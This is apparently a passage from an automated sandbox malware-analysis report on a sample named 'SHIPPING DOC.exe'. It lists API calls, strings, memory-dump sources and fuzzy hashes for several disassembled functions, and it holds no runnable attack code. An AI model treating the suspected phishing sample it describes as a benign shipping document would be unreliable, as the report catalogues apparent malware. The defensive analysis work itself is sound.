                                                                                                                      • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                                                                      APIs
                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00442663
                                                                                                                      • InternetCloseHandle.WININET ref: 00442668
                                                                                                                        • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleInternet$ObjectSingleWait
                                                                                                                      • String ID: aeB
                                                                                                                      • API String ID: 857135153-906807131
                                                                                                                      • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                      • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                                                                      • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                                                                      • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcsncpy
                                                                                                                      • String ID: ^B$C:\Users\user\Desktop\SHIPPING DOC.exe
                                                                                                                      • API String ID: 1735881322-1321486065
                                                                                                                      • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                      • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                                                                                                      • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                                                                                                      • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                                                                      • PostMessageW.USER32(00000000), ref: 00441C05
                                                                                                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                      • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                                                                      • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                                                                      • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                                                                      APIs
                                                                                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                                                                        • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FindMessagePostSleepWindow
                                                                                                                      • String ID: Shell_TrayWnd
                                                                                                                      • API String ID: 529655941-2988720461
                                                                                                                      • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                      • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                                                                      • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                                                                      • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                                                                      APIs
                                                                                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                                                                        • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Message_doexit
                                                                                                                      • String ID: AutoIt$Error allocating memory.
                                                                                                                      • API String ID: 1993061046-4017498283
                                                                                                                      • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                      • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                                                                      • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                                                                      • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D